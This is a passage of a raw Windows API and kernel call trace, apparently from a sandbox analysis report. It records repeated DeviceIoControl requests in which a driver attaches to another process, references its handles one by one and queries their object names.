Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80020cd2d0, HandleInformation=0x0) returned 0x0 [0225.245] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.245] PsReleaseProcessExitSynchronization () returned 0x2 [0225.245] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.245] ObQueryNameString (in: Object=0xfffffa80020cd2d0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.245] ObfDereferenceObject (Object=0xfffffa80020cd2d0) returned 0x1 [0225.245] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.245] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.245] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.245] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0225.246] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.246] PsAcquireProcessExitSynchronization () returned 0x0 [0225.246] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.246] ObReferenceObjectByHandle (in: Handle=0x12a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002176990, HandleInformation=0x0) returned 0x0 [0225.246] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.246] PsReleaseProcessExitSynchronization () returned 0x2 [0225.246] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.246] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003082044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003082044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.246] ObfDereferenceObject (Object=0xfffffa8002176990) returned 0x2 [0225.246] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.246] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.246] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.247] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0225.247] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.247] PsAcquireProcessExitSynchronization () returned 0x0 [0225.247] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.247] ObReferenceObjectByHandle (in: Handle=0x12ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036d25e0, HandleInformation=0x0) returned 0x0 [0225.247] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.247] PsReleaseProcessExitSynchronization () returned 0x2 [0225.247] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.247] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.247] ObfDereferenceObject (Object=0xfffffa80036d25e0) returned 0x2 [0225.247] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.247] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.247] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.247] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.247] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.248] PsAcquireProcessExitSynchronization () returned 0x0 [0225.248] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.248] ObReferenceObjectByHandle (in: Handle=0x12b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b3eb10, HandleInformation=0x0) returned 0x0 [0225.248] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.248] PsReleaseProcessExitSynchronization () returned 0x2 [0225.248] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.248] ObQueryNameString (in: Object=0xfffff8a001b3eb10, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.248] ObfDereferenceObject (Object=0xfffff8a001b3eb10) returned 0x1 [0225.248] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.248] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.248] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.248] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.248] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.248] PsAcquireProcessExitSynchronization () returned 0x0 [0225.248] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.248] ObReferenceObjectByHandle (in: Handle=0x12b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b55a60, HandleInformation=0x0) returned 0x0 [0225.248] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.248] PsReleaseProcessExitSynchronization () returned 0x2 [0225.249] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.249] ObQueryNameString (in: Object=0xfffff8a001b55a60, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.249] ObfDereferenceObject (Object=0xfffff8a001b55a60) returned 0x1 [0225.249] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.249] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.249] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.249] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0225.249] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.249] PsAcquireProcessExitSynchronization () returned 0x0 [0225.249] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.249] ObReferenceObjectByHandle (in: Handle=0x12b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800b53c5a0, HandleInformation=0x0) returned 0x0 [0225.249] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.249] PsReleaseProcessExitSynchronization () returned 0x2 [0225.249] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.249] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.249] ObfDereferenceObject (Object=0xfffffa800b53c5a0) returned 0x2 [0225.249] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.250] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.250] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.250] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0225.250] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.250] PsAcquireProcessExitSynchronization () returned 0x0 [0225.250] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.250] ObReferenceObjectByHandle (in: Handle=0x12c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800b53c6f0, HandleInformation=0x0) returned 0x0 [0225.250] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.250] PsReleaseProcessExitSynchronization () returned 0x2 [0225.250] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.250] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.250] ObfDereferenceObject (Object=0xfffffa800b53c6f0) returned 0x2 [0225.250] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.250] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.250] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.250] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.250] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.250] PsAcquireProcessExitSynchronization () returned 0x0 [0225.250] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.250] ObReferenceObjectByHandle (in: Handle=0x12cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b56230, HandleInformation=0x0) returned 0x0 [0225.250] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.251] PsReleaseProcessExitSynchronization () returned 0x2 [0225.251] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.251] ObQueryNameString (in: Object=0xfffff8a001b56230, ObjectNameInfo=0xfffffa8003076044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003076044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.251] ObfDereferenceObject (Object=0xfffff8a001b56230) returned 0x1 [0225.251] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.251] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.251] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.251] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x10c, lpOverlapped=0x0) returned 1 [0225.251] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.251] PsAcquireProcessExitSynchronization () returned 0x0 [0225.251] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.251] ObReferenceObjectByHandle (in: Handle=0x12d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ec1210, HandleInformation=0x0) returned 0x0 [0225.251] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.251] PsReleaseProcessExitSynchronization () returned 0x2 [0225.251] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.251] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003077044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003077044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.251] ObfDereferenceObject (Object=0xfffffa8001ec1210) returned 0x11 [0225.251] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.251] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.252] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.252] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0225.252] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.252] PsAcquireProcessExitSynchronization () returned 0x0 [0225.252] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.252] ObReferenceObjectByHandle (in: Handle=0x12dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002967d10, HandleInformation=0x0) returned 0x0 [0225.252] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.252] PsReleaseProcessExitSynchronization () returned 0x2 [0225.252] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.252] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.252] ObfDereferenceObject (Object=0xfffffa8002967d10) returned 0x2 [0225.252] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.252] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.252] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.252] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0225.252] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.252] PsAcquireProcessExitSynchronization () returned 0x0 [0225.252] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.252] ObReferenceObjectByHandle (in: Handle=0x12ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036d25e0, HandleInformation=0x0) returned 0x0 [0225.252] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.252] PsReleaseProcessExitSynchronization () returned 0x2 [0225.252] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.252] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.252] ObfDereferenceObject (Object=0xfffffa80036d25e0) returned 0x2 [0225.252] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.253] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.253] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.253] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.253] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.253] PsAcquireProcessExitSynchronization () returned 0x0 [0225.253] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.253] ObReferenceObjectByHandle (in: Handle=0x12f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a0010ff930, HandleInformation=0x0) returned 0x0 [0225.253] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.253] PsReleaseProcessExitSynchronization () returned 0x2 [0225.253] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.253] ObQueryNameString (in: Object=0xfffff8a0010ff930, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.253] ObfDereferenceObject (Object=0xfffff8a0010ff930) returned 0x1 [0225.253] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.253] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.253] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.253] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe2, lpOverlapped=0x0) returned 1 [0225.253] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.253] PsAcquireProcessExitSynchronization () returned 0x0 [0225.253] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.254] ObReferenceObjectByHandle (in: Handle=0x12f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002176990, HandleInformation=0x0) returned 0x0 [0225.254] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.254] PsReleaseProcessExitSynchronization () returned 0x2 [0225.254] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.254] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.254] ObfDereferenceObject (Object=0xfffffa8002176990) returned 0x2 [0225.254] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.254] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.254] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.254] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.254] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.254] PsAcquireProcessExitSynchronization () returned 0x0 [0225.254] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.254] ObReferenceObjectByHandle (in: Handle=0x12f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001b9eaf0, HandleInformation=0x0) returned 0x0 [0225.254] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.254] PsReleaseProcessExitSynchronization () returned 0x2 [0225.254] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.254] ObQueryNameString (in: Object=0xfffff8a001b9eaf0, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.254] ObfDereferenceObject (Object=0xfffff8a001b9eaf0) returned 0x1 [0225.254] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.254] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.254] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.254] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0225.254] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.255] PsAcquireProcessExitSynchronization () returned 0x0 [0225.255] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.255] ObReferenceObjectByHandle (in: Handle=0x1300, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001ba4830, HandleInformation=0x0) returned 0x0 [0225.255] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.255] PsReleaseProcessExitSynchronization () returned 0x2 [0225.255] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.255] ObQueryNameString (in: Object=0xfffff8a001ba4830, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.255] ObfDereferenceObject (Object=0xfffff8a001ba4830) returned 0x1 [0225.255] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.255] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.255] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.255] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0225.255] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.255] PsAcquireProcessExitSynchronization () returned 0x0 [0225.255] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880052b35d0) [0225.255] ObReferenceObjectByHandle (in: Handle=0x1308, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036d2730, HandleInformation=0x0) returned 0x0 [0225.255] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.255] PsReleaseProcessExitSynchronization () returned 0x2 [0225.255] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0225.255] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.255] ObfDereferenceObject (Object=0xfffffa80036d2730) returned 0x2 [0225.255] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.256] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: 